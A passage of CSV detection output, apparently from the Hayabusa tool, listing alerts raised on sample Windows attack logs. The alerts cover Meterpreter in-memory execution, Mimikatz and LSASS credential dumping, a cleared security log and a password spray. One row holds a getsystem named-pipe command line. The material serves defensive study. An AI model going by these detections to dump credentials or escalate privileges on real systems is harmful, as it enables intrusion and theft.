Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /c echo msdhch > \\.\pipe\msdhch : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 16:46:15.215 
+09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Meterpreter or Cobalt Strike Getsystem Service Start,,rules/sigma/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 
0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Security log was cleared,User: jwrig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:02.847 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:thessman/edygert/rbowes/jwright/celgee/ebooth/cmoody/tbennett/melliott/jlake/cfleener/psmith/drook/dpendolino/Administrator/wstrzelec/mdouglas/cspizor/cragoso/bhostetler/jleytevidal/sarmstrong/baker/gsalinas/lschifano/cdavis/jorchilles/bking/ssims/zmathis/econrad/smisenar/eskoudis/mtoussain/dmashburn/kperryman/jkulikowski/bgreenwood/lpesce/sanson/bgalbraith IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- +2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:17.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
